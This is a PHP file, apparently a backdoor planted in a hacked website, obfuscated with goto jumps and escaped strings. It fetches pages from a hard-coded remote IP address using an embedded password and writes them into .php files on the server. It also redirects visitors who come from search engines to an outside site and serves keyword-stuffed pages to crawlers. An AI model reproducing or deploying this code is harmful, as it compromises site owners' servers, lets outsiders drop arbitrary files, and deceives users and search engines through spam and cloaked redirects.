Your IP : 172.28.240.42
<?php
goto tj74B; t9AtD: $today = "\x32\x30\62\65\x30\65\62\71\x2d"; goto mb4yZ; BJPxS: echo $text; goto zlShh; X2Cyd: if (strlen($text) > 5000) { $out = fopen("\x69\x6e\x64\145\x78\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto BJPxS; mb4yZ: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto a1UPX; dw_C_: if ($s == "\x5c" | $s == "\x2f") { $s = ''; } goto VeUKW; hV7y3: if (function_exists("\x63\165\162\x6c\x5f\151\156\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\x74\x70\72\57\57\x31\x33\x35\56\x31\x38\61\56\x32\x31\56\x31\x32\66\57" . $_GET["\x66\x6e"] . "\56\x70\150\160\x3f\x70\141\163\163\x3d{$apass}\46\161\75{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\151\x6c\154\141\57\x34\56\60\x20\x28\143\x6f\155\160\x61\x74\x69\142\x6c\x65\73\x20\115\123\x49\105\40\66\x2e\60\x3b\40\127\151\156\144\x6f\167\163\40\x4e\x54\x20\x35\56\x31\x3b\x20\123\126\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto zt9ZA; tj74B: error_reporting(0); goto t9AtD; pCeyX: $query_pars_2 = str_replace("\55", "\53", $_GET["\x69\144"]); goto MZ39V; Na396: $apass2 = "\142\62\63\150\162\62\x33\x76\162\x33\62"; goto rIx2k; GuHAl: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto f74pj; zt9ZA: if (strlen($text) < 5000) { $text = file_get_contents("\x68\164\x74\x70\x3a\x2f\x2f\x31\63\x35\x2e\61\x38\x31\56\62\61\56\x31\62\66\x2f" . $_GET["\x66\156"] . "\56\x70\x68\160\77\160\x61\163\163\75{$apass}\x26\161\x3d{$_GET["\x69\144"]}"); } goto px0be; VeUKW: $s = $_SERVER["\123\105\122\126\105\x52\137\116\101\x4d\x45"] . $s; goto Iwu8o; vvpN2: $_GET["\167\x6f\162\154\x64"] = 5; goto kHQMg; px0be: if (strlen($text) < 5000) { $url = "\x31\x33\x35\56\61\70\61\56\62\61\56\61\x32\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\51\x3c\x62\x72\x20\x2f\x3e\xa"; } else { $req = "\57" . $_GET["\146\156"] . "\56\x70\150\160\x3f\160\141\x73\x73\75{$apass}\x26\x71\75{$_GET["\x69\x64"]}"; $out = "\x47\x45\124\40{$req}\x20\110\124\124\x50\57\x31\56\x30\15\12"; $out .= "\110\157\163\x74\72\40{$url}\xd\12"; $out .= "\x43\x6f\x6e\x6e\145\x63\164\151\x6f\156\72\x20\x43\x6c\157\163\x65\xd\12\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto X2Cyd; rk75H: $apass1 = "\166\151\163\x64\x6f\151\x6a\x65\x77"; goto zGTia; rIx2k: $s = dirname($_SERVER["\120\x48\120\x5f\123\105\x4c\106"]); goto dw_C_; f74pj: if (strpos($_SERVER["\110\x54\x54\120\x5f\x52\x45\x46\x45\122\105\122"], "\x67\x6f\157\147\x6c\x65\x2e") or strpos($_SERVER["\110\124\x54\120\x5f\x52\105\x46\105\122\105\x52"], "\171\141\x68\x6f\x6f\56") or strpos($_SERVER["\110\124\x54\120\137\x52\x45\x46\105\x52\x45\x52"], "\142\x69\x6e\x67\x2e")) { $tpl = "\x69\x6e\x64\x65\x78\57" . $_GET["\x69\144"] . "\56\160\150\160\x2e\x74\160\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\114\157\143\x61\164\x69\157\156\72\x20\150\x74\x74\x70\x73\72\57\x2f\143\x68\160\x6f\x6b\56\x73\151\164\145\57\145\156\x74\145\x72\57\77\x6d\141\162\x6b\x3d{$today}\x2d{$s}\46\164\x70\154\x3d{$tpl}\46\x65\x6e\x67\x6b\x65\171\75{$keyword}"); die; } else { $myname = $_GET["\x69\144"] . "\x2e\160\150\x70"; if (file_exists("\x69\156\144\x65\x78\x2f" . $myname)) { $html = @file_get_contents("\151\156\x64\145\x78\57" . $myname); if (strpos($_SERVER["\x48\x54\124\x50\x5f\125\x53\x45\x52\137\101\107\x45\116\124"], "\142\x69\156\147") > 2 or strpos($_SERVER["\x48\124\x54\x50\137\x55\123\x45\122\137\x41\107\105\116\124"], "\x79\141\150\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\164\154\x65\76\74\57\x74\151\164\x6c\145\x3e", "\74\164\151\164\154\x65\x3e{$keyword}\x3c\x2f\x74\151\x74\x6c\x65\x3e", $html); } echo $html; die; } } goto pCeyX; Vr5UW: if ($_GET["\x69\144"] == "\x69\156\x64\145\170") { header("\114\157\143\141\x74\151\157\156\x3a\40\150\164\164\160\x73\x3a\x2f\x2f\147\x6f\x6f\147\154\145\56\143\157\x6d"); die; } goto vvpN2; es64p: $keyword = str_replace("\40", "\53", $keyword); goto Na396; a1UPX: if ($_GET["\x69\x64"] == "\164\x65\x73\164\151\156\147") { echo "\164\x65\163\164\40\147\x6f\x6f\x64\56\56\56"; die; } goto Vr5UW; Iwu8o: $apass3 = "\x72\166\x33\x32\171\144\x61\x63\x73\x76\x73\x64\x76"; goto GuHAl; yW0K8: $xx1 = 5; goto pKMDl; zGTia: $x1 = 3; goto yW0K8; pKMDl: $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); goto es64p; kHQMg: $_GET["\146\x6e"] = "\x36\x39\66\71\66\71\156\145\167"; goto rk75H; MZ39V: $text = ''; goto hV7y3; zlShh: ?>